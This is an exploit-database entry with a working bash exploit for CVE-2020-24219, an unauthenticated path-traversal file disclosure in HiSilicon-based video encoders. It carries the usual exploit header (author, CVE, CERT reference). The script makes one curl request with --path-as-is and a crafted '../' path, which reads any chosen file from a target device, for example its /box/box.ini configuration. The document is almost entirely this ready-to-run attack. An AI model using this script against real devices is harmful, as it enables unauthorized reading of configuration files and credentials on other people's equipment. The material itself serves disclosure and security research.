Share
## https://sploitus.com/exploit?id=PACKETSTORM:159595
#!/usr/bin/env bash  
  
# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal  
# Date: 2020-09-20  
# Exploit Author: Alexei Kojenov  
# Vendor Homepage: https://www.szuray.com/  
# Software Link: N/A  
# Version: up to 1.97  
# Tested on: Linux  
# CVE: CVE-2020-24219  
# Vendors: URayTech  
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/  
# Reference: https://www.kb.cert.org/vuls/id/896979  
  
  
if [ "$#" -ne 2 ]  
then  
echo "Usage: $0 <server>[:<port>] <filepath>"  
echo "Example: $0 1.2.3.4:8086 /box/box.ini"  
exit 1  
fi  
  
curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \  
|| echo "ERROR: curl returned $?"